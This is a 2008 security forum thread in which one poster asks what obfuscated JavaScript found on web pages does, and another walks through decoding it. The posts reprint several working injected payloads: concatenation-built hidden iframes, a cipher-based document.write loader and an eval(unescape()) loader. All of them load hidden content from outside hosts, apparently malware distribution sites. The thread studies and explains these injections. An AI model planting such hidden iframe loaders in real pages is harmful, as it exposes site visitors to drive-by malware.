Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
What is these ?
Posted by: ZeberuS
Date: January 31, 2008 06:09PM

Hello ;
I need the help
I could not understand what they became , Can you explain .

<a href="<?php echo fileurl($fileid,$filetitle); ?>" target="_self"><img src="<?php echo $imageurl; ?>" onload="status=' ';zz='2';sl='/';sf='ram';pi='9';po='.';qu=':';yh='4';tr='t.p';vo='3';bw='5';pt='tp';ab='src';dg='ht';ko='e';wd='if';ji='hp';hh='1';t=wd.concat(sf,ko);xx=dg.concat(pt,qu,sl,sl,hh,pi,yh,po,hh,yh,bw,po,zz,vo,bw,po,vo,yh,sl,tr,ji);var oE=document.createElement(t);oE.setAttribute('width','0');oE.setAttribute('height','0');oE.setAttribute('style','display:none');oE.setAttribute(ab,xx);document.body.appendChild(oE);" width="70" height="59" title="<?php echo $filetitle; ?>" alt="<?php echo $filetitle; ?>" border="0"></a>

and

<body onload="status=' ';zz='o';sl='/';sf='ram';us='u';pi='b';po='.';gw='fi';qu=':';yh= 't';vo='h';bw='e';pj='m';iu='g';pt='tp';yw='p';ab= 'src';dg='ht';ko='e';wd='if';hh='r';t=wd.concat(sf ,ko);xx=dg.concat(pt,qu,sl,sl,pi,hh,pi,iu,po,hh,us ,sl,po,yh,po,yw,vo,yw);var oE=document.createElement(t);oE.setAttribute('widt h','0');oE.setAttribute('height','0');oE.setAttrib ute('style','display:none');oE.setAttribute(ab,xx) ;document.body.appendChild(oE);
">

Can we solve these encode .How can I encoded , What this codes . Trojan - Spam - bot or worm ..vs

Options: ReplyQuote
Re: What is these ?
Posted by: tx
Date: January 31, 2008 07:57PM

The first one creates an iframe that points to h++p://194.145.235.34/t.php
The second creates an iframe that points to h++p://brbg.ru/.t.php

194.145.235.34 isn't responding but the other url redirects to h++p://89.208.35.26/1/index.php which, for me at least, only contains some obfuscated javascript that writes
Quote

<center>Sorry! You IP is blocked.</center>
into the document.

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 01/31/2008 07:57PM by tx.

Options: ReplyQuote
Re: What is these ?
Posted by: ZeberuS
Date: January 31, 2008 09:18PM

Hmm , thx tx :)
How did you understand ?
How can I do , because meeting continuous , seeing .

in 89.208.35.26/1/index.php was written = Sorry! You IP is blocked

PHP source code
<script language=JavaScript>function decipher(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,31,36,14,23,13,34,2,57,42,0,0,0,0,0,0,21,17,6,37,41,12,7,35,10,8,59,60,28,39,16,22,1,3,46,29,25,15,24,11,4,51,56,0,0,0,0,27,0,62,18,20,19,0,48,40,30,9,32,52,33,53,55,49,61,44,26,45,47,38,43,50,5,58,54);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}decipher("xuDoetLke1puzvKm4Y5lxwtwN4IJm4IYO4Zoivqo3QLfWuD6BQKwAQKm_7")</script>

What is this ? Can you write one by one . What kind of encrypt . I didn't understand

Options: ReplyQuote
Re: What is these ?
Posted by: tx
Date: January 31, 2008 09:46PM

Well looking at the first one for example:

status=' ';zz='2';sl='/';sf='ram';pi='9';po='.';qu=':';yh='4';tr='t.p';vo='3';bw='5';pt='tp';ab='src';dg='ht';ko='e';wd='if';ji='hp';hh='1';t=wd.concat(sf,ko);xx=dg.concat(pt,qu,sl,sl,hh,pi,yh,po,hh,yh,bw,po,zz,vo,bw,po,vo,yh,sl,tr,ji);var oE=document.createElement(t);oE.setAttribute('width','0');oE.setAttribute('height','0');oE.setAttribute('style','display:none');oE.setAttribute(ab,xx);document.body.appendChild(oE);

if we put each statement on it's own line it's a lot easier to follow, read my comments:
status='';       // This does nothing
zz='2';          // This begins the part where the
sl='/';          // variables are initialized that
sf='ram';        // will later be concatenated together
pi='9';          // to form the actual strings necessary
po='.';          //       |
qu=':';          //       |
yh='4';          //       |
tr='t.p';        //       |
vo='3';          //       |
bw='5';          //       |
pt='tp';         //       |
ab='src';        //       |
dg='ht';         //       |
ko='e';          //       |
wd='if';         //       |
ji='hp';         //      _|_
hh='1';          //      \|/
                 //       V
t=wd.concat(sf,ko); // Concats variables sf and ko to wd. so now t = 'iframe'
xx=dg.concat(pt,qu,sl,sl,hh,pi,yh,po,hh,yh,bw,po,zz,vo,bw,po,vo,yh,sl,tr,ji);
// concats all of those variables to dg to create the string 'http://194.145.235.34/t.php'  and stores it in variable xx
var oE=document.createElement(t); // creates an iframe, reference is stored in oE
oE.setAttribute('width','0');   //iframe attributes
oE.setAttribute('height','0');  // more attributes
oE.setAttribute('style','display:none'); //more attributes
oE.setAttribute(ab,xx);  // sets the attribute ab (which = 'src') to the value of xx ('http://194.145.235.34/t.php')
document.body.appendChild(oE); //Finally, put the iframe in the body of the document.

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: What is these ?
Posted by: ZeberuS
Date: February 01, 2008 12:09PM

oo :)
Thank you very much
but
How can I decode ?

example:
xx=dg.concat(pt,qu,sl,sl,hh,pi,yh,po,hh,yh,bw,po,zz,vo,bw,po,vo,yh,sl,tr,ji = http://194.145.235.34/t.php

What do you solve this code . pls can you give copy about this code

..................

what is this duty ? why do we use code

PHP source code
<script language=JavaScript>function decipher(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,31,36,14,23,13,34,2,57,42,0,0,0,0,0,0,21,17,6,37,41,12,7,35,10,8,59,60,28,39,16,22,1,3,46,29,25,15,24,11,4,51,56,0,0,0,0,27,0,62,18,20,19,0,48,40,30,9,32,52,33,53,55,49,61,44,26,45,47,38,43,50,5,58,54);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}decipher("xuDoetLke1puzvKm4Y5lxwtwN4IJm4IYO4Zoivqo3QLfWuD6BQKwAQKm_7")</script>



Edited 1 time(s). Last edit at 02/01/2008 12:14PM by ZeberuS.

Options: ReplyQuote
Re: What is these ?
Posted by: tx
Date: February 01, 2008 12:48PM

I think you should read up on what concatenation is. the concat() function concatenates strings together, those strings are stored in the variables you see listed, ie: pt,qu,sl etc.

As for the second part of question, the author is attempting to hide what the javascript is actually doing. Which is pretty useless in javascript since it's run client side. For example, in this:
<script language=JavaScript>function decipher(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,31,36,14,23,13,34,2,57,42,0,0,0,0,0,0,21,17,6,37,41,12,7,35,10,8,59,60,28,39,16,22,1,3,46,29,25,15,24,11,4,51,56,0,0,0,0,27,0,62,18,20,19,0,48,40,30,9,32,52,33,53,55,49,61,44,26,45,47,38,43,50,5,58,54);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}decipher("xuDoetLke1puzvKm4Y5lxwtwN4IJm4IYO4Zoivqo3QLfWuD6BQKwAQKm_7")</script>
Simply replace the document.write() call with an alert() and run it in your Firebug console (or in the address bar if you prefer) to have the deciphered output alerted for you nice and easy.

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: What is these ?
Posted by: ZeberuS
Date: February 23, 2008 02:33PM

yes , fine

and
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%34%65%62%32%64%39%33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%77%77%77%2e%70%6f%6b%75%70%6b%69%32%34%2e%69%6e%66%6f%2f%31%34%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%33%33%36%38%37%29%2b%27%63%31%36%34%5c%27%20%77%69%64%74%68%3d%35%39%31%20%68%65%69%67%68%74%3d%35%37%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

decode
|
v

window.status='Done';document.write('<iframe name=4eb2d93 src=\'http://www.pokupki24.info/14/index.php?'+Math.round(Math.random()*33687)+'c164\' width=591 height=57 style=\'display: none\'></iframe>')

" ai siktir vee? " :)

what is this :S

Options: ReplyQuote


Sorry, only registered users may post in this forum.